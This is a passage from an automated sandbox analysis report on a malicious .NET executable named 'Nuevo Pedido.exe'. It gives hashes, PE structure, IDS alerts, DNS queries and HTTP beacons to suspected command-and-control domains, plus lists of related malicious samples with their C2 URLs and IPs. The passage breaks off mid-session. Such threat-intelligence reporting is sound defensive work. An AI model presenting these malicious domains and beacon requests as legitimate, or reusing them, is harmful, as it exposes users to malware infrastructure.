                                New Order INQ211118.exeGet hashmaliciousBrowse
                                • www.cleversights.com/ng6c/?JBGdjn1=EPV2/NoACT8dHOR9v1gyCHceGsyPjrlJM+UK8aQEskssrzMl224UALhiEE2fgJmZ+elx&8pB8=1bqLQxdXG
                                Quote.exeGet hashmaliciousBrowse
                                • www.sandspringsramblers.com/g2fg/?1btd=IfCDV&CTEp9H=ge+LGbGWprSeotpzV0+Q+kydhBjB2swQkk5yFtO6ceAAyVR8yEXyjgFWO6AISkVeqI4m
                                111821 New Order_xlxs.exeGet hashmaliciousBrowse
                                • www.methodicalservices.com/oae0/?UDKtfT=0pSD8r20Ixf8_&9rGxtBkx=0YzjOyVp+Yb6xacNTkTkmGCYCJkm2COrsGtOu7+4k+P6CiNE0Q3WT0+8/3B2OogfveoZ
                                rEC0x536o5.exeGet hashmaliciousBrowse
                                • www.evaccines.com/s3f1/?XZeT=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&_dIpGp=dTiPIlmXgVLtX
                                Booking Confirmation 548464656_pdf.exeGet hashmaliciousBrowse
                                • www.metaversealive.com/cfb2/?4hGdfRT=Agu3xtL1ZQO5CFfrtHOGjgVP3skWkN/ViqH4UJ4za8OjNS089a88X4B7IihWeXraBDmd&2dM4Gf=e4hhCbFxvtz0ztm
                                Purchase Order Ref No_ Q51100732.xlsxGet hashmaliciousBrowse
                                • www.fondoflouisville.com/dyh6/?NL0hl=kQyzM0Wln+3leUBi0Wmn3eENdAam7BCJPPELL5jXxpKBYvrw3jMhvOGuqF2XIvtdQ71vEA==&v2M=r0DdC04HWpDX
                                AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                • www.inklusion.online/n8ds/?9rJT=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&at=WtR4GZm
                                order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                                • www.godrejs-windsor.com/vocn/?5jYXyzb=pnlTJGUzE5gMj2POSUsxOYM9XX/o1stqBdRTzx6fWnpbF/A27HO5FUQYdB9AbrLCdWzy&IL08W8=d6AXkVBHUjyXZ
                                Inquiry Sheet.docGet hashmaliciousBrowse
                                • www.babehairboutique.com/cy88/?7nLpW=-ZKlyLs0ebYdGfJ&QZ=K8MP/gXd9fA79gQ3nARZg5fl4N3QoqdUhkC4TU9uNhwqyFbAVwd8tffptZPcvcemife8Lg==
                                PO-No 243563746 Sorg.exeGet hashmaliciousBrowse
                                • www.webmakers.xyz/seqa/?tvv=ihZT8RaXnH5DP6&R48TL=PArQXewhCLQ/aGYQG57zH1nhkqDi1nj517XyI5njozHkI0sb3Vjromuzr7tZwLe6Yf/2
                                ORDER REMINDER.docGet hashmaliciousBrowse
                                • www.quetaylor.com/zaip/?r2JPlFDH=HAqh6cOe6LTcTwCBF16MZHaJ4csidjMHsZ2CzJlUzLX8i4OfANm4LybqNg7cEAPcNuVe8g==&Ozu8Z=qxoHsxEPs4u
                                Order Specification.docGet hashmaliciousBrowse
                                • www.vestamobile.com/c28n/?-Zl=BwxsM8rRu+R6ZjIadp4KdiQptkWWHTzqe5Z/ld4s21xj8K8eoUYG89NnPoNyzSQIYa401Q==&Rnjl=fpapUTW
                                Company Profile.exeGet hashmaliciousBrowse
                                • www.foxtmz.com/dc02/?1bNDudv=jqmdPTLkNRVMK4Spw6uhP9oU8xT3oy405F5bn/JxP7BlJCyt3yS/r4AEAC6uqXEsbJlK&Tp=NBZl4DOPndid

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                UNIFIEDLAYER-AS-1USsurvey-1384723731.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                survey-1378794827.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                survey-1384723731.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                survey-1378794827.xlsGet hashmaliciousBrowse
                                • 192.185.79.2
                                QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                • 162.240.9.164
                                SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exeGet hashmaliciousBrowse
                                • 192.185.84.191
                                Swift Copy TT.docGet hashmaliciousBrowse
                                • 50.116.86.94
                                8M5ZqXSa28.exeGet hashmaliciousBrowse
                                • 192.185.129.44
                                Change Order - Draw #3 .htmGet hashmaliciousBrowse
                                • 162.214.66.227
                                new-1834138397.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                new-1834138397.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                new-1179494065.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                Hsbc swift.exeGet hashmaliciousBrowse
                                • 192.232.249.14
                                new-1179494065.xlsGet hashmaliciousBrowse
                                • 108.179.253.213
                                microcomputer Official Order.exeGet hashmaliciousBrowse
                                • 192.185.84.191
                                Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                • 70.40.220.123
                                t 2021.HtMLGet hashmaliciousBrowse
                                • 192.185.129.43
                                New Order778880.exeGet hashmaliciousBrowse
                                • 192.185.167.112
                                IyRUJT27dd.exeGet hashmaliciousBrowse
                                • 192.185.113.96
                                LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                • 162.241.24.173
                                TEAMINTERNET-ASDEff0231.exeGet hashmaliciousBrowse
                                • 185.53.178.54
                                xDG1WDcI0o.exeGet hashmaliciousBrowse
                                • 185.53.179.92
                                nHSmNKw7PN.exeGet hashmaliciousBrowse
                                • 185.53.178.54
                                PjvBTyWpg6.exeGet hashmaliciousBrowse
                                • 185.53.177.20
                                Telex.exeGet hashmaliciousBrowse
                                • 185.53.177.53
                                rEC0x536o5.exeGet hashmaliciousBrowse
                                • 185.53.178.54
                                Tax payment invoice - Wd, November 17, 2021,pdf.exeGet hashmaliciousBrowse
                                • 185.53.179.90
                                PO_ MOQ883763882.docGet hashmaliciousBrowse
                                • 185.53.178.12
                                Order Specification.docGet hashmaliciousBrowse
                                • 185.53.178.12
                                29383773738387477474774.exeGet hashmaliciousBrowse
                                • 185.53.177.53
                                Tax payment invoice - Wed, November 10, 2021,pdf.exeGet hashmaliciousBrowse
                                • 185.53.179.90
                                Factura_842.pdf.exeGet hashmaliciousBrowse
                                • 185.53.178.50
                                Draft shipping docs CI+PL.xlsxGet hashmaliciousBrowse
                                • 185.53.177.10
                                32vCkFTS0X.exeGet hashmaliciousBrowse
                                • 185.53.179.94
                                61Wq3BOwiA.exeGet hashmaliciousBrowse
                                • 185.53.178.51
                                Order Information.exeGet hashmaliciousBrowse
                                • 185.53.179.94
                                lCFjxhAqu3.exeGet hashmaliciousBrowse
                                • 185.53.178.10
                                2FNlQLySZS.exeGet hashmaliciousBrowse
                                • 185.53.178.13
                                o4EjNRKCKq.exeGet hashmaliciousBrowse
                                • 185.53.178.30
                                tgSQwVSEzE.exeGet hashmaliciousBrowse
                                • 185.53.177.12

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log
                                Process:C:\Users\user\Desktop\Nuevo Pedido.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2239
                                Entropy (8bit):5.354287817410997
                                Encrypted:false
                                SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                MD5:913D1EEA179415C6D08FB255AE42B99D
                                SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.844153530186034
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Nuevo Pedido.exe
                                File size:444928
                                MD5:159c46c59cd8ecb7a2bce707de1bc370
                                SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
                                SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
                                SHA512:909c79f9172d2d525d25a02e050fd55d2043fbf257479de73a70bcb323984da620aac0abdb105194e88a5df8b135d5d27ee1e69ee56511211a89c4e911155417
                                SSDEEP:12288:ZRGvM0ReBZwHIRu6HfMTr6hNprMfGmzGixBFm:ZRIM0ReBZwHkHIrGholGi1
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.a..............0.................. ........@.. ....................... ............@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x46ddfe
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x619F6582 [Thu Nov 25 10:29:22 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [ebp+0800000Eh], ch
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6ddac0x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x5ec.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x6be140x6c000False0.883305302373data7.85660170333IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x6e0000x5ec0x600False0.438802083333data4.21429058876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x700000xc0x200False0.041015625data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x6e0900x35cdata
                                RT_MANIFEST0x6e3fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightCopyright Rogers Peet
                                Assembly Version8.0.6.0
                                InternalNameMethodImplAttribut.exe
                                FileVersion5.6.0.0
                                CompanyNameRogers Peet
                                LegalTrademarks
                                Comments
                                ProductNameBiblan
                                ProductVersion5.6.0.0
                                FileDescriptionBiblan
                                OriginalFilenameMethodImplAttribut.exe

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                11/25/21-15:10:30.664595TCP1201ATTACK-RESPONSES 403 Forbidden8049784185.53.178.53192.168.2.5
                                11/25/21-15:11:10.632399TCP1201ATTACK-RESPONSES 403 Forbidden8049839185.53.179.91192.168.2.5

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2021 15:10:30.605460882 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.622345924 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.623855114 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.641732931 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.644892931 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.664511919 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.664594889 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.664649963 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:30.664774895 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.664819956 CET4978480192.168.2.5185.53.178.53
                                Nov 25, 2021 15:10:30.682296038 CET8049784185.53.178.53192.168.2.5
                                Nov 25, 2021 15:10:35.726473093 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.746747017 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.746944904 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.747081041 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.767386913 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.767437935 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.767457962 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:35.767685890 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.767745972 CET4978680192.168.2.53.64.163.50
                                Nov 25, 2021 15:10:35.788788080 CET80497863.64.163.50192.168.2.5
                                Nov 25, 2021 15:10:46.187716007 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.194947958 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.309931040 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:49.310199976 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.310664892 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.426548958 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:49.426577091 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:49.426889896 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.427073956 CET4981680192.168.2.5209.17.116.163
                                Nov 25, 2021 15:10:49.541748047 CET8049816209.17.116.163192.168.2.5
                                Nov 25, 2021 15:10:59.691447973 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:10:59.895230055 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:10:59.895332098 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:10:59.895478964 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:00.097284079 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:00.399027109 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:00.648233891 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:01.556123972 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:01.556169987 CET8049838192.232.250.147192.168.2.5
                                Nov 25, 2021 15:11:01.556250095 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:01.556274891 CET4983880192.168.2.5192.232.250.147
                                Nov 25, 2021 15:11:10.581495047 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.598289013 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.598505020 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.615405083 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.615487099 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.632355928 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.632399082 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.632415056 CET8049839185.53.179.91192.168.2.5
                                Nov 25, 2021 15:11:10.632605076 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.632667065 CET4983980192.168.2.5185.53.179.91
                                Nov 25, 2021 15:11:10.649518013 CET8049839185.53.179.91192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2021 15:10:28.557399035 CET5712853192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:29.541821003 CET5712853192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:30.537902117 CET5712853192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:30.595156908 CET53571288.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:35.684943914 CET5046353192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:35.723468065 CET53504638.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:40.778733969 CET5853053192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:40.961405993 CET53585308.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:46.014628887 CET5381353192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:46.186077118 CET53538138.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:54.439486027 CET5734453192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:54.490019083 CET53573448.8.8.8192.168.2.5
                                Nov 25, 2021 15:10:59.496768951 CET5445053192.168.2.58.8.8.8
                                Nov 25, 2021 15:10:59.690080881 CET53544508.8.8.8192.168.2.5
                                Nov 25, 2021 15:11:05.443424940 CET5926153192.168.2.58.8.8.8
                                Nov 25, 2021 15:11:05.481781960 CET53592618.8.8.8192.168.2.5
                                Nov 25, 2021 15:11:10.502841949 CET5715153192.168.2.58.8.8.8
                                Nov 25, 2021 15:11:10.580288887 CET53571518.8.8.8192.168.2.5
                                Nov 25, 2021 15:11:21.011703014 CET6051653192.168.2.58.8.8.8
                                Nov 25, 2021 15:11:21.075328112 CET53605168.8.8.8192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 25, 2021 15:10:28.557399035 CET192.168.2.58.8.8.80xb6eeStandard query (0)www.tremblock.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:29.541821003 CET192.168.2.58.8.8.80xb6eeStandard query (0)www.tremblock.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:30.537902117 CET192.168.2.58.8.8.80xb6eeStandard query (0)www.tremblock.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:35.684943914 CET192.168.2.58.8.8.80x71a6Standard query (0)www.rcepjobs.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:40.778733969 CET192.168.2.58.8.8.80x9af3Standard query (0)www.sosibibyslot.websiteA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:46.014628887 CET192.168.2.58.8.8.80x9e9cStandard query (0)www.downingmunroe.onlineA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:54.439486027 CET192.168.2.58.8.8.80x579aStandard query (0)www.blueprintroslyn.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:59.496768951 CET192.168.2.58.8.8.80xcd40Standard query (0)www.thejohnmatt.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:05.443424940 CET192.168.2.58.8.8.80x841dStandard query (0)www.securebankofamericalog.siteA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:10.502841949 CET192.168.2.58.8.8.80xdf5dStandard query (0)www.onlinedatingthaiweb.comA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:21.011703014 CET192.168.2.58.8.8.80x5040Standard query (0)www.trenddoffical.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 25, 2021 15:10:30.595156908 CET8.8.8.8192.168.2.50xb6eeNo error (0)www.tremblock.com185.53.178.53A (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:35.723468065 CET8.8.8.8192.168.2.50x71a6No error (0)www.rcepjobs.com3.64.163.50A (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:40.961405993 CET8.8.8.8192.168.2.50x9af3Name error (3)www.sosibibyslot.websitenonenoneA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:46.186077118 CET8.8.8.8192.168.2.50x9e9cNo error (0)www.downingmunroe.online209.17.116.163A (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:54.490019083 CET8.8.8.8192.168.2.50x579aName error (3)www.blueprintroslyn.comnonenoneA (IP address)IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET8.8.8.8192.168.2.50xcd40No error (0)www.thejohnmatt.comthejohnmatt.comCNAME (Canonical name)IN (0x0001)
                                Nov 25, 2021 15:10:59.690080881 CET8.8.8.8192.168.2.50xcd40No error (0)thejohnmatt.com192.232.250.147A (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:05.481781960 CET8.8.8.8192.168.2.50x841dName error (3)www.securebankofamericalog.sitenonenoneA (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:10.580288887 CET8.8.8.8192.168.2.50xdf5dNo error (0)www.onlinedatingthaiweb.com185.53.179.91A (IP address)IN (0x0001)
                                Nov 25, 2021 15:11:21.075328112 CET8.8.8.8192.168.2.50x5040Name error (3)www.trenddoffical.comnonenoneA (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.tremblock.com
                                • www.rcepjobs.com
                                • www.downingmunroe.online
                                • www.thejohnmatt.com
                                • www.onlinedatingthaiweb.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.549784185.53.178.5380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:30.644892931 CET9620OUTGET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.tremblock.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:30.664594889 CET9620INHTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:10:30 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.5497863.64.163.5080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 25, 2021 15:10:35.747081041 CET14112OUTGET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.rcepjobs.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:10:35.767437935 CET14112INHTTP/1.1 410 Gone
                                Server: openresty
                                Date: Thu, 25 Nov 2021 14:10:35 GMT
                                Content-Type: text/html
                                Transfer-Encoding: chunked
                                Connection: close
